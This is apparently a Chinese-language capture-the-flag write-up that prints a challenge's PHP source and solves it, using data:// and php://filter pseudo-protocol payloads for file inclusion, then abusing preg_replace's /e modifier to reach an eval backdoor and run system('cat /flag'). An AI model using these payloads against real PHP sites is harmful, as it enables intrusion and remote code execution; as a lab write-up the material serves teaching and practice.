进入后有源码
<?php
error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
if(preg_match("/flag/",$file)){
die("Not now!");
}
include($file); //next.php
}
else{
highlight_file(__FILE__);
}
?>
1.有文件包含,但是url无明显控制点,考虑伪协议
2.需要I have a dream
绕过检测
3.提示了next.php
伪协议参考:PHP-伪协议_php伪协议读取文件_@摘星怪的博客-CSDN博客
构造:
text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php
解码后获得next.php的源码
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;
function complex($re, $str) {
return preg_replace(
'/(' . $re . ')/ei',
'strtolower("\\1")',
$str
);
}
foreach($_GET as $re => $str) {
echo complex($re, $str). "\n";
}
function getFlag(){
@eval($_GET['cmd']);
}
参考:[BUUCTF][BJDCTF2020]ZJCTF,不过如此1(做题记录-CSDN博客
在 PHP 中,`preg_replace` 是一个强大的正则表达式替换函数。它可以在一个字符串中使用正则表达式搜索和替换指定的文本。
函数语法如下:
preg_replace($pattern, $replacement, $subject);这里的 `$pattern` 是一个正则表达式字符串,用于指定搜索的模式, `$replacement` 是替换成的字符串, `$subject` 是要搜索和替换的原始字符串或字符串数组。
`preg_replace` 函数返回一个替换后的字符串或数组。如果没有任何匹配项,则返回原始字符串或数组。
逐字翻译一下这里的正则:
( 开始定义一个捕获分组,并匹配其中的子表达式;
$re 表示使用 $re 变量包含的正则表达式来作为子表达式;
) 结束定义捕获分组;
/ 结束定义正则表达式;
e 操作符表示将匹配到的表达式当做 PHP 代码来执行;
i 操作符表示匹配时忽略大小写的差异。foreach循环把所有的参数对分次交给complex函数运行
getFlag一句话木马,"cmd"作为参数
审计总结:需要构造两个参数:
作为正则表达式匹配条件的参数名 且 这个参数值为的"getFlag();"参数名:cmd 和 需要php执行的代码
PS:\S是什么意思?
正则表达式\S匹配非空字符
构造:
/?text=data://text/pain,I have a dream&file=next.php&\S*=${getFlag()}&cmd=system('cat /flag');